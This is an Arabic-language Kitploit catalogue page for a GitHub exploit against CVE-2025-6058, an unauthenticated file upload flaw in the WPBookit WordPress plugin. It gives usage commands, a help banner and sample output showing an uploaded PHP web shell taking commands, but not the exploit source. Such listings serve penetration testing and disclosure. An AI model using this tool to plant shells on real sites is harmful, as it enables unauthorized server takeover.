Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6058 — WPBookit <= 1.0.4 - رفع ملفات اعتباطي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-6058
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - رفع ملفات اعتباطي بدون مصادقة

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚡ WPBookit <= 1.0.4 - رفع ملفات تعسفي بدون مصادقة


📝 الوصف

إضافة WPBookit لـ WordPress عرضة لرفع ملفات تعسفي بسبب عدم التحقق من نوع الملف في دالة image_upload_handle()، والتي تُربط عبر مسار add_booking_type في جميع الإصدارات حتى 1.0.4 وما يتضمنها.
يسمح هذا الخلل للمهاجمين غير المصادقين برفع ملفات تعسفية إلى خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

CVEدرجة CVSSنُشر علنًاآخر تحديث
CVE-2025-60589.8 (حرجة)11 يوليو 202512 يوليو 2025

🚀 ماذا يفعل هذا الاستغلال؟

يقوم هذا الاستغلال بأتمتة:

  • اكتشاف ما إذا كان الهدف يشغّل إصدارًا عرضة للخطر من WPBookit (<= 1.0.4)
  • رفع قشرة PHP باستخدام المسار القابل للاستغلال، دون مصادقة
  • تأكيد رفع القشرة وتوفير مسارها الدقيق لتنفيذ الأوامر عن بُعد

🛠️ الاستخدام

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ مثال

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 مثال على المساعدة واللافتة

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com/wordpress

📤 المخرجات

root@kitploit:~
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية ولاختبارات الاختراق المصرح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو نشاط غير مصرح به.
استخدمها على مسؤوليتك الخاصة، وتأكد دائمًا من حصولك على إذن لاختبار النظام المستهدف.


بواسطة: Khaled Alenazi (Nxploited)

تنزيل الأداة